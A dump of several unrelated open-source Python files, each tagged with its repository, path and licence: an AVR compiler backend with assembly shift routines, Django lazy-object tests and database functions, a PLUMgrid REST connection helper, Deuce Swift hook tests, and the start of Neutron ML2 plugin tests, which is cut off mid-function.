obj2 = c3c(c3_sources, [], self)
obj = link([obj1, obj2], partial_link=True)
return obj
def determine_arg_locations(self, arg_types):
""" Given a set of argument types, determine location for argument """
locations = []
regs = [
r25,
r24,
r23,
r22,
r21,
r20,
r19,
r18,
r17,
r16,
r15,
r14,
r13,
r12,
r11,
r10,
r9,
r8,
]
for a in arg_types:
sizes = {ir.i8: 1, ir.u8: 1, ir.i16: 2, ir.u16: 2, ir.ptr: 2}
s = sizes[a]
# Round odd registers:
if s % 2 == 1:
regs.pop(0)
# Determine register:
if s == 1:
r = regs.pop(0)
locations.append(r)
elif s == 2:
regs.pop(0)
lo_reg = regs.pop(0)
r = get16reg(lo_reg.num)
locations.append(r)
else: # pragma: no cover
raise NotImplementedError(str(s))
return locations
def determine_rv_location(self, ret_type):
rv = W
return rv
def expand_word_regs(self, registers):
s = set()
for register in registers:
if isinstance(register, AvrWordRegister):
s.add(register.hi)
s.add(register.lo)
else:
s.add(register)
return s
def gen_prologue(self, frame):
""" Generate the prologue instruction sequence. """
# Label indication function:
yield Label(frame.name)
# Save some registers:
used_regs = self.expand_word_regs(frame.used_regs)
for register in callee_save:
if register in used_regs:
yield Push(register)
if frame.stacksize > 0:
# Save previous frame pointer and fill it from the SP:
yield Push(Y.lo)
yield Push(Y.hi)
# Push N times to adjust stack:
for _ in range(frame.stacksize):
yield Push(r0)
# Setup frame pointer:
yield In(Y.lo, 0x3D)
yield In(Y.hi, 0x3E)
# ATTENTION: after push, the stackpointer points to the next empty
# byte.
# Increment entire Y by one to point to address frame+0:
yield Adiw(Y, 1)
def gen_epilogue(self, frame):
""" Return epilogue sequence for a frame. Adjust frame pointer
and add constant pool
"""
if frame.stacksize > 0:
# Pop x times to adjust stack:
for _ in range(frame.stacksize):
yield Pop(r0)
yield Pop(Y.hi)
yield Pop(Y.lo)
# Restore registers:
used_regs = self.expand_word_regs(frame.used_regs)
for register in reversed(callee_save):
if register in used_regs:
yield Pop(register)
yield Ret()
# Add final literal pool:
for instruction in self.litpool(frame):
yield instruction
yield Alignment(4) # Align at 4 bytes
def gen_call(self, frame, label, args, rv):
arg_types = [a[0] for a in args]
arg_locs = self.determine_arg_locations(arg_types)
# Copy parameters:
for arg_loc, arg2 in zip(arg_locs, args):
arg = arg2[1]
if isinstance(arg_loc, AvrRegister):
yield self.move(arg_loc, arg)
elif isinstance(arg_loc, AvrWordRegister):
yield self.move(arg_loc, arg)
else: # pragma: no cover
raise NotImplementedError("Parameters in memory not impl")
arg_regs = set(l for l in arg_locs if isinstance(l, Register))
yield RegisterUseDef(uses=arg_regs)
if isinstance(label, AvrWordRegister):
yield self.move(Z, label)
# Call to function at Z
# Divide Z by two, since PC is pointing to 16 bits words
yield instructions.Lsr(registers.r31)
yield instructions.Ror(registers.r30)
yield instructions.Icall(clobbers=self.caller_save)
else:
yield Call(label, clobbers=self.caller_save)
if rv:
retval_loc = self.determine_rv_location(rv[0])
yield RegisterUseDef(defs=(retval_loc,))
if isinstance(rv[1], AvrWordRegister):
yield self.move(rv[1], retval_loc)
else: # pragma: no cover
raise NotImplementedError("Parameters in memory not impl")
def gen_function_enter(self, args):
""" Copy arguments into local temporaries and mark registers live """
arg_types = [a[0] for a in args]
arg_locs = self.determine_arg_locations(arg_types)
arg_regs = set(l for l in arg_locs if isinstance(l, Register))
yield RegisterUseDef(defs=arg_regs)
# Copy parameters:
for arg_loc, arg2 in zip(arg_locs, args):
arg = arg2[1]
if isinstance(arg_loc, Register):
yield self.move(arg, arg_loc)
else: # pragma: no cover
raise NotImplementedError("Parameters in memory not impl")
def gen_function_exit(self, rv):
live_out = set()
if rv:
retval_loc = self.determine_rv_location(rv[0])
yield self.move(retval_loc, rv[1])
live_out.add(retval_loc)
yield RegisterUseDef(uses=live_out)
def litpool(self, frame):
""" Generate instruction for the current literals """
# Align at 4 bytes
if frame.constants:
yield SectionInstruction("data")
yield Alignment(4)
# Add constant literals:
while frame.constants:
label, value = frame.constants.pop(0)
yield Label(label)
if isinstance(value, bytes):
for byte in value:
yield Db(byte)
yield Alignment(4) # Align at 4 bytes
else: # pragma: no cover
raise NotImplementedError(
"Constant of type {}".format(value)
)
yield SectionInstruction("code")
def between_blocks(self, frame):
for instruction in self.litpool(frame):
yield instruction
def move(self, dst, src):
""" Generate a move from src to dst """
if isinstance(dst, AvrRegister) and isinstance(src, AvrRegister):
return Mov(dst, src, ismove=True)
elif isinstance(dst, AvrWordRegister) and isinstance(
src, AvrWordRegister
):
return Movw(dst, src, ismove=True)
else: # pragma: no cover
raise NotImplementedError()
asm_rt_src = """
; shift r25:r24 right by r22 bits
global __shr16
__shr16:
push r16
mov r16, r22
cpi r16, 0
breq __shr16_2
__shr16_1:
lsr r25
ror r24
dec r16
cpi r16, 0
brne __shr16_1
__shr16_2:
pop r16
ret
; shift r24 right by r22 bits
global __shr8
__shr8:
push r16
mov r16, r22
cpi r16, 0
breq __shr8_2
__shr8_1:
lsr r24
dec r16
cpi r16, 0
brne __shr8_1
__shr8_2:
pop r16
ret
; shift r25:r24 left by r22 bits
global __shl16
__shl16:
push r16
mov r16, r22
cpi r16, 0
breq __shl16_2
__shl16_1:
add r24, r24
adc r25, r25
dec r16
cpi r16, 0
brne __shl16_1
__shl16_2:
pop r16
ret
; shift r24 left by r22 bits
global __shl8
__shl8:
push r16
mov r16, r22
cpi r16, 0
breq __shl8_2
__shl8_1:
add r24, r24
dec r16
cpi r16, 0
brne __shl8_1
__shl8_2:
pop r16
ret
"""
| bsd-2-clause |
potatolondon/django-nonrel-1-4 | tests/regressiontests/utils/simplelazyobject.py | 33 | 3440 | import copy
import pickle
from django.utils.unittest import TestCase
from django.utils.functional import SimpleLazyObject, empty
class _ComplexObject(object):
def __init__(self, name):
self.name = name
def __eq__(self, other):
return self.name == other.name
def __hash__(self):
return hash(self.name)
def __str__(self):
return "I am _ComplexObject(%r)" % self.name
def __unicode__(self):
return unicode(self.name)
def __repr__(self):
return "_ComplexObject(%r)" % self.name
complex_object = lambda: _ComplexObject("joe")
class TestUtilsSimpleLazyObject(TestCase):
"""
Tests for SimpleLazyObject
"""
# Note that concrete use cases for SimpleLazyObject are also found in the
# auth context processor tests (unless the implementation of that function
# is changed).
def test_equality(self):
self.assertEqual(complex_object(), SimpleLazyObject(complex_object))
self.assertEqual(SimpleLazyObject(complex_object), complex_object())
def test_hash(self):
# hash() equality would not be true for many objects, but it should be
# for _ComplexObject
self.assertEqual(hash(complex_object()),
hash(SimpleLazyObject(complex_object)))
def test_repr(self):
# For debugging, it will really confuse things if there is no clue that
# SimpleLazyObject is actually a proxy object. So we don't
# proxy __repr__
self.assertTrue("SimpleLazyObject" in repr(SimpleLazyObject(complex_object)))
def test_str(self):
self.assertEqual("I am _ComplexObject('joe')", str(SimpleLazyObject(complex_object)))
def test_unicode(self):
self.assertEqual(u"joe", unicode(SimpleLazyObject(complex_object)))
def test_class(self):
# This is important for classes that use __class__ in things like
# equality tests.
self.assertEqual(_ComplexObject, SimpleLazyObject(complex_object).__class__)
def test_deepcopy(self):
# Check that we *can* do deep copy, and that it returns the right
# objects.
# First, for an unevaluated SimpleLazyObject
s = SimpleLazyObject(complex_object)
self.assertIs(s._wrapped, empty)
s2 = copy.deepcopy(s)
# something has gone wrong is s is evaluated
self.assertIs(s._wrapped, empty)
self.assertEqual(s2, complex_object())
# Second, for an evaluated SimpleLazyObject
name = s.name # evaluate
self.assertIsNot(s._wrapped, empty)
s3 = copy.deepcopy(s)
self.assertEqual(s3, complex_object())
def test_none(self):
i = [0]
def f():
i[0] += 1
return None
x = SimpleLazyObject(f)
self.assertEqual(str(x), "None")
self.assertEqual(i, [1])
self.assertEqual(str(x), "None")
self.assertEqual(i, [1])
def test_bool(self):
x = SimpleLazyObject(lambda: 3)
self.assertTrue(x)
x = SimpleLazyObject(lambda: 0)
self.assertFalse(x)
def test_pickle_complex(self):
# See ticket #16563
x = SimpleLazyObject(complex_object)
pickled = pickle.dumps(x)
unpickled = pickle.loads(pickled)
self.assertEqual(unpickled, x)
self.assertEqual(unicode(unpickled), unicode(x))
self.assertEqual(unpickled.name, x.name)
| bsd-3-clause |
ClovisIRex/Snake-django | env/lib/python3.6/site-packages/django/db/models/functions/base.py | 44 | 8087 | """
Classes that represent database functions.
"""
from django.db.models import Func, Transform, Value, fields
class Cast(Func):
"""
Coerce an expression to a new field type.
"""
function = 'CAST'
template = '%(function)s(%(expressions)s AS %(db_type)s)'
mysql_types = {
fields.CharField: 'char',
fields.IntegerField: 'signed integer',
fields.FloatField: 'signed',
}
def __init__(self, expression, output_field):
super(Cast, self).__init__(expression, output_field=output_field)
def as_sql(self, compiler, connection, **extra_context):
if 'db_type' not in extra_context:
extra_context['db_type'] = self._output_field.db_type(connection)
return super(Cast, self).as_sql(compiler, connection, **extra_context)
def as_mysql(self, compiler, connection):
extra_context = {}
output_field_class = type(self._output_field)
if output_field_class in self.mysql_types:
extra_context['db_type'] = self.mysql_types[output_field_class]
return self.as_sql(compiler, connection, **extra_context)
def as_postgresql(self, compiler, connection):
# CAST would be valid too, but the :: shortcut syntax is more readable.
return self.as_sql(compiler, connection, template='%(expressions)s::%(db_type)s')
class Coalesce(Func):
"""
Chooses, from left to right, the first non-null expression and returns it.
"""
function = 'COALESCE'
def __init__(self, *expressions, **extra):
if len(expressions) < 2:
raise ValueError('Coalesce must take at least two expressions')
super(Coalesce, self).__init__(*expressions, **extra)
def as_oracle(self, compiler, connection):
# we can't mix TextField (NCLOB) and CharField (NVARCHAR), so convert
# all fields to NCLOB when we expect NCLOB
if self.output_field.get_internal_type() == 'TextField':
class ToNCLOB(Func):
function = 'TO_NCLOB'
expressions = [
ToNCLOB(expression) for expression in self.get_source_expressions()]
clone = self.copy()
clone.set_source_expressions(expressions)
return super(Coalesce, clone).as_sql(compiler, connection)
return self.as_sql(compiler, connection)
class ConcatPair(Func):
"""
A helper class that concatenates two arguments together. This is used
by `Concat` because not all backend databases support more than two
arguments.
"""
function = 'CONCAT'
def __init__(self, left, right, **extra):
super(ConcatPair, self).__init__(left, right, **extra)
def as_sqlite(self, compiler, connection):
coalesced = self.coalesce()
return super(ConcatPair, coalesced).as_sql(
compiler, connection, template='%(expressions)s', arg_joiner=' || '
)
def as_mysql(self, compiler, connection):
# Use CONCAT_WS with an empty separator so that NULLs are ignored.
return super(ConcatPair, self).as_sql(
compiler, connection, function='CONCAT_WS', template="%(function)s('', %(expressions)s)"
)
def coalesce(self):
# null on either side results in null for expression, wrap with coalesce
c = self.copy()
expressions = [
Coalesce(expression, Value('')) for expression in c.get_source_expressions()
]
c.set_source_expressions(expressions)
return c
class Concat(Func):
"""
Concatenates text fields together. Backends that result in an entire
null expression when any arguments are null will wrap each argument in
coalesce functions to ensure we always get a non-null result.
"""
function = None
template = "%(expressions)s"
def __init__(self, *expressions, **extra):
if len(expressions) < 2:
raise ValueError('Concat must take at least two expressions')
paired = self._paired(expressions)
super(Concat, self).__init__(paired, **extra)
def _paired(self, expressions):
# wrap pairs of expressions in successive concat functions
# exp = [a, b, c, d]
# -> ConcatPair(a, ConcatPair(b, ConcatPair(c, d))))
if len(expressions) == 2:
return ConcatPair(*expressions)
return ConcatPair(expressions[0], self._paired(expressions[1:]))
class Greatest(Func):
"""
Chooses the maximum expression and returns it.
If any expression is null the return value is database-specific:
On Postgres, the maximum not-null expression is returned.
On MySQL, Oracle, and SQLite, if any expression is null, null is returned.
"""
function = 'GREATEST'
def __init__(self, *expressions, **extra):
if len(expressions) < 2:
raise ValueError('Greatest must take at least two expressions')
super(Greatest, self).__init__(*expressions, **extra)
def as_sqlite(self, compiler, connection):
"""Use the MAX function on SQLite."""
return super(Greatest, self).as_sqlite(compiler, connection, function='MAX')
class Least(Func):
"""
Chooses the minimum expression and returns it.
If any expression is null the return value is database-specific:
On Postgres, the minimum not-null expression is returned.
On MySQL, Oracle, and SQLite, if any expression is null, null is returned.
"""
function = 'LEAST'
def __init__(self, *expressions, **extra):
if len(expressions) < 2:
raise ValueError('Least must take at least two expressions')
super(Least, self).__init__(*expressions, **extra)
def as_sqlite(self, compiler, connection):
"""Use the MIN function on SQLite."""
return super(Least, self).as_sqlite(compiler, connection, function='MIN')
class Length(Transform):
"""Returns the number of characters in the expression"""
function = 'LENGTH'
lookup_name = 'length'
def __init__(self, expression, **extra):
output_field = extra.pop('output_field', fields.IntegerField())
super(Length, self).__init__(expression, output_field=output_field, **extra)
def as_mysql(self, compiler, connection):
return super(Length, self).as_sql(compiler, connection, function='CHAR_LENGTH')
class Lower(Transform):
function = 'LOWER'
lookup_name = 'lower'
class Now(Func):
template = 'CURRENT_TIMESTAMP'
def __init__(self, output_field=None, **extra):
if output_field is None:
output_field = fields.DateTimeField()
super(Now, self).__init__(output_field=output_field, **extra)
def as_postgresql(self, compiler, connection):
# Postgres' CURRENT_TIMESTAMP means "the time at the start of the
# transaction". We use STATEMENT_TIMESTAMP to be cross-compatible with
# other databases.
return self.as_sql(compiler, connection, template='STATEMENT_TIMESTAMP()')
class Substr(Func):
function = 'SUBSTRING'
def __init__(self, expression, pos, length=None, **extra):
"""
expression: the name of a field, or an expression returning a string
pos: an integer > 0, or an expression returning an integer
length: an optional number of characters to return
"""
if not hasattr(pos, 'resolve_expression'):
if pos < 1:
raise ValueError("'pos' must be greater than 0")
pos = Value(pos)
expressions = [expression, pos]
if length is not None:
if not hasattr(length, 'resolve_expression'):
length = Value(length)
expressions.append(length)
super(Substr, self).__init__(*expressions, **extra)
def as_sqlite(self, compiler, connection):
return super(Substr, self).as_sql(compiler, connection, function='SUBSTR')
def as_oracle(self, compiler, connection):
return super(Substr, self).as_sql(compiler, connection, function='SUBSTR')
class Upper(Transform):
function = 'UPPER'
lookup_name = 'upper'
| mit |
wallnerryan/quantum_migrate | quantum/plugins/plumgrid/plumgrid_nos_plugin/rest_connection.py | 2 | 3469 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2013 PLUMgrid, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# @author: Edgar Magana, emagana@plumgrid.com, PLUMgrid, Inc.
# @author: Brenden Blanco, bblanco@plumgrid.com, PLUMgrid, Inc.
"""
Quantum PLUMgrid Plug-in for PLUMgrid Virtual Technology
This plugin will forward authenticated REST API calls
to the Network Operating System by PLUMgrid called NOS
"""
import httplib
import urllib2
from quantum.openstack.common import jsonutils as json
from quantum.openstack.common import log as logging
from quantum.plugins.plumgrid.common import exceptions as plum_excep
LOG = logging.getLogger(__name__)
class RestConnection(object):
"""REST Connection to PLUMgrid NOS Server."""
def __init__(self, server, port, timeout):
LOG.debug(_('QuantumPluginPLUMgrid Status: REST Connection Started'))
self.server = server
self.port = port
self.timeout = timeout
def nos_rest_conn(self, nos_url, action, data, headers):
self.nos_url = nos_url
body_data = json.dumps(data)
if not headers:
headers = {}
headers['Content-type'] = 'application/json'
headers['Accept'] = 'application/json'
LOG.debug(_("PLUMgrid_NOS_Server: %s %s %s"), self.server, self.port,
action)
conn = httplib.HTTPConnection(self.server, self.port,
timeout=self.timeout)
if conn is None:
LOG.error(_('PLUMgrid_NOS_Server: Could not establish HTTP '
'connection'))
return
try:
LOG.debug(_("PLUMgrid_NOS_Server Sending Data: %s %s %s"),
nos_url, body_data, headers)
conn.request(action, nos_url, body_data, headers)
resp = conn.getresponse()
resp_str = resp.read()
LOG.debug(_("PLUMgrid_NOS_Server Connection Data: %s, %s"),
resp, resp_str)
if resp.status is httplib.OK:
try:
respdata = json.loads(resp_str)
LOG.debug(_("PLUMgrid_NOS_Server Connection RESP: %s"),
respdata)
pass
except ValueError:
err_message = _("PLUMgrid HTTP Connection Failed: ")
LOG.Exception(err_message)
raise plum_excep.PLUMgridException(err_message)
ret = (resp.status, resp.reason, resp_str)
except urllib2.HTTPError, e:
LOG.error(_('PLUMgrid_NOS_Server: %(action)s failure, %(e)r'))
ret = 0, None, None, None
conn.close()
LOG.debug(_("PLUMgrid_NOS_Server: status=%(status)d, "
"reason=%(reason)r, ret=%(ret)s"),
{'status': ret[0], 'reason': ret[1], 'ret': ret[2]})
return ret
| apache-2.0 |
rackerlabs/deuce | deuce/tests/test_openstack_swift_hook.py | 1 | 10337 | import falcon
import mock
import binascii
import base64
import json
import deuce
from deuce.transport.wsgi import hooks
from deuce.drivers import swift
from deuce.tests import HookTest
def before_hooks_swift(req, resp, params):
return [
hooks.OpenstackSwiftHook(req, resp, params)
]
class DummyClassObject(object):
pass
class TestOpenstackSwiftHook(HookTest):
def setUp(self):
super(TestOpenstackSwiftHook, self).setUp()
self.datacenter = 'test'
self.headers = {}
deuce.context = DummyClassObject()
deuce.context.datacenter = self.datacenter
deuce.context.project_id = self.create_project_id()
deuce.context.transaction = DummyClassObject()
deuce.context.transaction.request_id = 'openstack-hook-test'
deuce.context.openstack = DummyClassObject()
def test_is_not_swift_driver(self):
with mock.patch('deuce.storage_driver', object):
self.app_setup(before_hooks_swift)
self.simulate_get('/v1.0')
def test_is_swift_driver(self):
with mock.patch('deuce.storage_driver',
spec=swift.SwiftStorageDriver) as swift_driver:
with mock.patch('deuce.transport.wsgi.hooks.'
'openstackswifthook.check_storage_url'
) as hook_check_storage_url:
self.app_setup(before_hooks_swift)
hook_check_storage_url.return_value = True
self.simulate_get('/v1.0')
def test_missing_service_catalog(self):
with mock.patch('deuce.storage_driver',
spec=swift.SwiftStorageDriver):
self.app_setup(before_hooks_swift)
response = self.simulate_get('/v1.0', headers=self.headers)
self.assertEqual(self.srmock.status, falcon.HTTP_400)
def test_has_service_catalog(self):
with mock.patch('deuce.storage_driver',
spec=swift.SwiftStorageDriver) as swift_driver:
with mock.patch('deuce.transport.wsgi.hooks.'
'openstackswifthook.decode_service_catalog'
) as decode_catalog:
decode_catalog.return_value = True
with mock.patch('deuce.transport.wsgi.hooks.'
'openstackswifthook.find_storage_url'
) as find_storage:
find_storage.return_value = 'test_url'
self.assertFalse(hasattr(deuce.context.openstack, 'swift'))
self.app_setup(before_hooks_swift)
self.simulate_get(
'/v1.0',
headers={
'x-service-catalog': 'mock'})
self.assertTrue(hasattr(deuce.context.openstack, 'swift'))
self.assertTrue(hasattr(deuce.context.openstack.swift,
'storage_url'))
self.assertEqual(deuce.context.openstack.swift.storage_url,
'test_url')
def test_failed_base64_decode_service_catalog(self):
with mock.patch('deuce.storage_driver',
spec=swift.SwiftStorageDriver) as swift_driver:
with mock.patch('base64.b64decode') as b64_decoder:
b64_decoder.side_effect = binascii.Error('mock')
self.app_setup(before_hooks_swift)
response = self.simulate_get(
'/v1.0',
headers={
'x-service-catalog': 'mock'})
self.assertEqual(self.srmock.status, falcon.HTTP_412)
def test_failed_json_decode_service_catalog(self):
with mock.patch('deuce.storage_driver',
spec=swift.SwiftStorageDriver) as swift_driver:
with mock.patch('base64.b64decode') as b64_decoder:
b64_decoder.return_value = str('test-data').encode(
encoding='utf-8', errors='strict')
self.app_setup(before_hooks_swift)
response = self.simulate_get(
'/v1.0',
headers={
'x-service-catalog': 'mock'})
self.assertEqual(self.srmock.status, falcon.HTTP_412)
def test_json_decode_service_catalog(self):
with mock.patch('deuce.storage_driver',
spec=swift.SwiftStorageDriver) as swift_driver:
with mock.patch('base64.b64decode') as b64_decoder:
b64_decoder.return_value = json.dumps(
{'hello': 'test'}).encode(encoding='utf-8',
errors='strict')
with mock.patch('deuce.transport.wsgi.hooks.'
'openstackswifthook.find_storage_url'
) as find_storage:
find_storage.return_value = 'test_url'
self.assertFalse(hasattr(deuce.context.openstack, 'swift'))
self.app_setup(before_hooks_swift)
response = self.simulate_get(
'/v1.0',
headers={
'x-service-catalog': 'mock'})
self.assertTrue(hasattr(deuce.context.openstack, 'swift'))
self.assertTrue(hasattr(deuce.context.openstack.swift,
'storage_url'))
self.assertEqual(deuce.context.openstack.swift.storage_url,
'test_url')
def test_find_storage_url_invalid_service_catalog(self):
with mock.patch('deuce.storage_driver',
spec=swift.SwiftStorageDriver) as swift_driver:
json_data = json.dumps({'hello': 'test'})
byte_data = json_data.encode(encoding='utf-8', errors='strict')
with mock.patch('base64.b64decode') as b64_decoder:
b64_decoder.return_value = byte_data
self.app_setup(before_hooks_swift)
response = self.simulate_get(
'/v1.0',
headers={
'x-service-catalog': 'mock'})
self.assertEqual(self.srmock.status, falcon.HTTP_412)
def test_find_storage_url_invalid_service_catalog_with_access(self):
with mock.patch('deuce.storage_driver',
spec=swift.SwiftStorageDriver) as swift_driver:
with mock.patch('base64.b64decode') as b64_decoder:
test_dict = {'access': {'hello': 'test'}}
b64_decoder.return_value = json.dumps(test_dict).encode(
encoding='utf-8', errors='strict')
self.app_setup(before_hooks_swift)
response = self.simulate_get(
'/v1.0',
headers={
'x-service-catalog': 'mock'})
self.assertEqual(self.srmock.status, falcon.HTTP_412)
def test_find_storage_url_no_object_store(self):
with mock.patch('deuce.storage_driver',
spec=swift.SwiftStorageDriver) as swift_driver:
with mock.patch('base64.b64decode') as b64_decoder:
b64_decoder.return_value = json.dumps(
self.create_service_catalog(
objectStoreType='mock')).encode(
encoding='utf-8', errors='strict')
self.app_setup(before_hooks_swift)
response = self.simulate_get(
'/v1.0',
headers={
'x-service-catalog': 'mock'})
self.assertEqual(self.srmock.status, falcon.HTTP_412)
def test_find_storage_url_no_endpoints(self):
with mock.patch('deuce.storage_driver',
spec=swift.SwiftStorageDriver) as swift_driver:
catalog = self.create_service_catalog(endpoints=False)
json_data = json.dumps(catalog)
byte_data = json_data.encode(encoding='utf-8', errors='strict')
with mock.patch('base64.b64decode') as b64_decoder:
b64_decoder.return_value = byte_data
self.app_setup(before_hooks_swift)
response = self.simulate_get(
'/v1.0',
headers={
'x-service-catalog': 'mock'})
self.assertEqual(self.srmock.status, falcon.HTTP_412)
def test_find_storage_url_no_region(self):
with mock.patch('deuce.storage_driver',
spec=swift.SwiftStorageDriver) as swift_driver:
with mock.patch('base64.b64decode') as b64_decoder:
b64_decoder.return_value = json.dumps(
self.create_service_catalog(region='other')).encode(
encoding='utf-8', errors='strict')
self.app_setup(before_hooks_swift)
response = self.simulate_get(
'/v1.0',
headers={
'x-service-catalog': 'mock'})
self.assertEqual(self.srmock.status, falcon.HTTP_412)
def test_find_storage_url_final(self):
catalog = self.create_service_catalog(region=self.datacenter,
url='test_url')
json_data = json.dumps(catalog)
utf8_data = json_data.encode(encoding='utf-8', errors='strict')
b64_data = base64.b64encode(utf8_data)
with mock.patch('deuce.storage_driver',
spec=swift.SwiftStorageDriver) as swift_driver:
self.assertFalse(hasattr(deuce.context.openstack, 'swift'))
self.app_setup(before_hooks_swift)
response = self.simulate_get(
'/v1.0',
headers={
'x-service-catalog': b64_data})
self.assertTrue(hasattr(deuce.context.openstack, 'swift'))
self.assertTrue(hasattr(deuce.context.openstack.swift,
'storage_url'))
self.assertEqual(deuce.context.openstack.swift.storage_url,
'test_url')
| apache-2.0 |
leeseulstack/openstack | neutron/tests/unit/ml2/test_ml2_plugin.py | 5 | 52265 | # Copyright (c) 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import contextlib
import mock
import testtools
import uuid
import webob
from neutron.common import constants
from neutron.common import exceptions as exc
from neutron.common import utils
from neutron import context
from neutron.db import db_base_plugin_v2 as base_plugin
from neutron.db import l3_db
from neutron.extensions import external_net as external_net
from neutron.extensions import l3agentscheduler
from neutron.extensions import multiprovidernet as mpnet
from neutron.extensions import portbindings
from neutron.extensions import providernet as pnet
from neutron import manager
from neutron.plugins.common import constants as service_constants
from neutron.plugins.ml2.common import exceptions as ml2_exc
from neutron.plugins.ml2 import config
from neutron.plugins.ml2 import db as ml2_db
from neutron.plugins.ml2 import driver_api
from neutron.plugins.ml2 import driver_context
from neutron.plugins.ml2.drivers import type_vlan
from neutron.plugins.ml2 import models
from neutron.plugins.ml2 import plugin as ml2_plugin
from neutron.tests import base
from neutron.tests.unit import _test_extension_portbindings as test_bindings
from neutron.tests.unit.ml2.drivers import mechanism_logger as mech_logger
from neutron.tests.unit.ml2.drivers import mechanism_test as mech_test
from neutron.tests.unit import test_db_plugin as test_plugin
from neutron.tests.unit import test_extension_allowedaddresspairs as test_pair
from neutron.tests.unit import test_extension_extradhcpopts as test_dhcpopts
from neutron.tests.unit import test_security_groups_rpc as test_sg_rpc
config.cfg.CONF.import_opt('network_vlan_ranges',
'neutron.plugins.ml2.drivers.type_vlan',
group='ml2_type_vlan')
PLUGIN_NAME = 'neutron.plugins.ml2.plugin.Ml2Plugin'
class Ml2PluginV2TestCase(test_plugin.NeutronDbPluginV2TestCase):
_plugin_name = PLUGIN_NAME
_mechanism_drivers = ['logger', 'test']
def setUp(self):
# We need a L3 service plugin
l3_plugin = ('neutron.tests.unit.test_l3_plugin.'
'TestL3NatServicePlugin')
service_plugins = {'l3_plugin_name': l3_plugin}
# Enable the test mechanism driver to ensure that
# we can successfully call through to all mechanism
# driver apis.
config.cfg.CONF.set_override('mechanism_drivers',
self._mechanism_drivers,
group='ml2')
self.physnet = 'physnet1'
self.vlan_range = '1:100'
self.vlan_range2 = '200:300'
self.physnet2 = 'physnet2'
self.phys_vrange = ':'.join([self.physnet, self.vlan_range])
self.phys2_vrange = ':'.join([self.physnet2, self.vlan_range2])
config.cfg.CONF.set_override('network_vlan_ranges',
[self.phys_vrange, self.phys2_vrange],
group='ml2_type_vlan')
super(Ml2PluginV2TestCase, self).setUp(PLUGIN_NAME,
service_plugins=service_plugins)
self.port_create_status = 'DOWN'
self.driver = ml2_plugin.Ml2Plugin()
self.context = context.get_admin_context()
class TestMl2BulkToggleWithBulkless(Ml2PluginV2TestCase):
_mechanism_drivers = ['logger', 'test', 'bulkless']
def test_bulk_disable_with_bulkless_driver(self):
self.assertTrue(self._skip_native_bulk)
class TestMl2BulkToggleWithoutBulkless(Ml2PluginV2TestCase):
_mechanism_drivers = ['logger', 'test']
def test_bulk_enabled_with_bulk_drivers(self):
self.assertFalse(self._skip_native_bulk)
class TestMl2BasicGet(test_plugin.TestBasicGet,
Ml2PluginV2TestCase):
pass
class TestMl2V2HTTPResponse(test_plugin.TestV2HTTPResponse,
Ml2PluginV2TestCase):
pass
class TestMl2NetworksV2(test_plugin.TestNetworksV2,
Ml2PluginV2TestCase):
pass
class TestMl2SubnetsV2(test_plugin.TestSubnetsV2,
Ml2PluginV2TestCase):
pass
class TestMl2PortsV2(test_plugin.TestPortsV2, Ml2PluginV2TestCase):
def test_update_port_status_build(self):
with self.port() as port:
self.assertEqual('DOWN', port['port']['status'])
self.assertEqual('DOWN', self.port_create_status)
def test_update_non_existent_port(self):
ctx = context.get_admin_context()
plugin = manager.NeutronManager.get_plugin()
data = {'port': {'admin_state_up': False}}
self.assertRaises(exc.PortNotFound, plugin.update_port, ctx,
'invalid-uuid', data)
def test_delete_non_existent_port(self):
ctx = context.get_admin_context()
plugin = manager.NeutronManager.get_plugin()
with mock.patch.object(ml2_plugin.LOG, 'debug') as log_debug:
plugin.delete_port(ctx, 'invalid-uuid', l3_port_check=False)
log_debug.assert_has_calls([
mock.call(_("Deleting port %s"), 'invalid-uuid'),
mock.call(_("The port '%s' was deleted"), 'invalid-uuid')
])
def test_l3_cleanup_on_net_delete(self):
l3plugin = manager.NeutronManager.get_service_plugins().get(
service_constants.L3_ROUTER_NAT)
kwargs = {'arg_list': (external_net.EXTERNAL,),
external_net.EXTERNAL: True}
with self.network(**kwargs) as n:
with self.subnet(network=n, cidr='200.0.0.0/22'):
l3plugin.create_floatingip(
context.get_admin_context(),
{'floatingip': {'floating_network_id': n['network']['id'],
'tenant_id': n['network']['tenant_id']}}
)
self._delete('networks', n['network']['id'])
flips = l3plugin.get_floatingips(context.get_admin_context())
self.assertFalse(flips)
def test_delete_port_no_notify_in_disassociate_floatingips(self):
ctx = context.get_admin_context()
plugin = manager.NeutronManager.get_plugin()
l3plugin = manager.NeutronManager.get_service_plugins().get(
service_constants.L3_ROUTER_NAT)
with contextlib.nested(
self.port(do_delete=False),
mock.patch.object(l3plugin, 'disassociate_floatingips'),
mock.patch.object(l3plugin, 'notify_routers_updated')
) as (port, disassociate_floatingips, notify):
port_id = port['port']['id']
plugin.delete_port(ctx, port_id)
# check that no notification was requested while under
# transaction
disassociate_floatingips.assert_has_calls([
mock.call(ctx, port_id, do_notify=False)
])
# check that notifier was still triggered
notify.assert_has_calls([
mock.call(ctx, disassociate_floatingips.return_value)
])
def test_check_if_compute_port_serviced_by_dvr(self):
self.assertTrue(utils.is_dvr_serviced('compute:None'))
def test_check_if_lbaas_vip_port_serviced_by_dvr(self):
self.assertTrue(utils.is_dvr_serviced(
constants.DEVICE_OWNER_LOADBALANCER))
def test_check_if_dhcp_port_serviced_by_dvr(self):
self.assertTrue(utils.is_dvr_serviced(constants.DEVICE_OWNER_DHCP))
def test_check_if_port_not_serviced_by_dvr(self):
self.assertFalse(utils.is_dvr_serviced(
constants.DEVICE_OWNER_ROUTER_INTF))
def test_disassociate_floatingips_do_notify_returns_nothing(self):
ctx = context.get_admin_context()
l3plugin = manager.NeutronManager.get_service_plugins().get(
